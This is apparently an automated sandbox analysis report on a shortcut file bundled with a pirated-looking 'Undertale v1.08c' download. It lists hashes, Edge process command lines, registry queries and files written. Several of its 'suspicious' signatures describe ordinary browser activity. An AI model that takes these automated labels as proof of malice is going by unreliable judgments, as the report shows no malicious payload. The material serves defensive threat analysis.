Analysis
-
max time kernel
145s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
01-07-2024 04:32
Static task
static1
Behavioral task
behavioral1
Sample
Undertale_v1.08c/Undertale_v1.08c_setup.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
Undertale_v1.08c/Undertale_v1.08c_setup.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
Undertale_v1.08c/tuttop.com.url
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
Undertale_v1.08c/tuttop.com.url
Resource
win10v2004-20240611-en
General
-
Target
Undertale_v1.08c/tuttop.com.url
-
Size
109B
-
MD5
994ceda3baeeafa875c17598f97387a6
-
SHA1
0c5d2297bdf8f712f5fbbf495e1f9add9d76d8ee
-
SHA256
b577a2d69bc2e609b6aa32aaf6e78a0aae3aeba2517d23edabe14387cd478c18
-
SHA512
7a8fdd683c546daa52a2275c2a461880d519d898ed08c86eac35360d6007b211aaf478ac6409d5340fe7ec67adca07a0d9dc20b2245c9c80293ada6f15251c46
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepid process 1512 msedge.exe 1512 msedge.exe 1208 msedge.exe 1208 msedge.exe 4692 identity_helper.exe 4692 identity_helper.exe 4492 msedge.exe 4492 msedge.exe 4492 msedge.exe 4492 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exepid process 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
msedge.exepid process 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe 1208 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
rundll32.exemsedge.exedescription pid process target process PID 1724 wrote to memory of 1208 1724 rundll32.exe msedge.exe PID 1724 wrote to memory of 1208 1724 rundll32.exe msedge.exe PID 1208 wrote to memory of 4488 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4488 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4808 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 1512 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 1512 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe PID 1208 wrote to memory of 4636 1208 msedge.exe msedge.exe
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Undertale_v1.08c\tuttop.com.url1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://tuttop.com/2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9ac5746f8,0x7ff9ac574708,0x7ff9ac5747183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4952 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9534271064072310159,548916856063895213,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5477462b6ad8eaaf8d38f5e3a4daf17b0
SHA186174e670c44767c08a39cc2a53c09c318326201
SHA256e6bbd4933b9baa1df4bb633319174de07db176ec215e71c8568d27c5c577184d
SHA512a0acc2ef7fd0fcf413572eeb94d1e38aa6a682195cc03d6eaaaa0bc9e5f4b2c0033da0b835f4617aebc52069d0a10b52fc31ed53c2fe7943a480b55b7481dd4e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5b704c9ca0493bd4548ac9c69dc4a4f27
SHA1a3e5e54e630dabe55ca18a798d9f5681e0620ba7
SHA2562ebd5229b9dc642afba36a27c7ac12d90196b1c50985c37e94f4c17474e15411
SHA51269c8116fb542b344a8c55e2658078bd3e0d3564b1e4c889b072dbc99d2b070dacbc4394dedbc22a4968a8cf9448e71f69ec71ded018c1bacc0e195b3b3072d32
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
168B
MD5f919a6cb218e1329629812e9efa231f6
SHA162e30562f316d6a40b5b348dcca04333fafcd820
SHA25617b7680fa1e39b2960770fa04c8c2e96c327b85b902b4ecde9ef55832bc89fbe
SHA51299b97f068417d7c5474b563917a1f11319c5975970546ea9b0e1c70b092bcf9fbb5acb9b63431a52076b519b840d20be6b1610c728cc720c8d9ef8f8229a1243
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
573B
MD5dc3cb08d7516ca133a73103248795730
SHA1a4957ed9aa3117b4872a4720ebc27fa9278a4f5f
SHA2569064722e444d24407a9cd2622ebb7aefe434a962224023f1bc5c4e1df0a6a19b
SHA51217e16a508b3df70c5bcd3d405f61b3949ef970ae14e8299956639174fb1a06946018349d21d12d047263696b9590ad15cc7742834a95ac6acb3ba6daaf159bb6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD53e9502657b4a6310038c3985bd6493f8
SHA1045ed8f2dddc97456dbaea1e081413a4faaa37f9
SHA256ca2824b0eba2f1c3c24f65bdb701bab6d342dda069864f0096edef260f2989b1
SHA512cd08aa73a2a1642d3d871006bba07e6ff7696d86e4c363e066ddf066867e3f88f09fe10d23935dbd6725837c6cf847564277243b9ca50e13cbffbbb564b29b07
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD50a15b1bdd691a41d7eab5229326c68d8
SHA18259ccf3130b70d59935811c21457550d02ae19e
SHA25648399b61f4e240ddecd5076f20717badb10876ee1f2994f1c30cadc89a97331a
SHA512a6cbcf15afdd19bea27f75b89dee9498023fbb18f9bab244780a7e6f6d74e5fb8c88893c4bc95f56f933061d516ad90d4b3d6847de1f98639ad79afd67737d0f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5861bcbeae6e3ab97ccd1431c608b4c51
SHA1fcf91b0a16f248d4ade55df40e6fd26b2a35e48c
SHA25633afbc23b4b95e8a4babbf10ad1845bb2a1a790793c3046ca89b86a6d3831488
SHA5129ecce5179feb17d74316abf79fa325f8373d9c68798417d2337b8397881480d456d19007d1ccf1d14971807ba39c907589458b010ae82f69d46a5a32a2f885b4
-
\??\pipe\LOCAL\crashpad_1208_CKXEIWNXOQVVYTHYMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e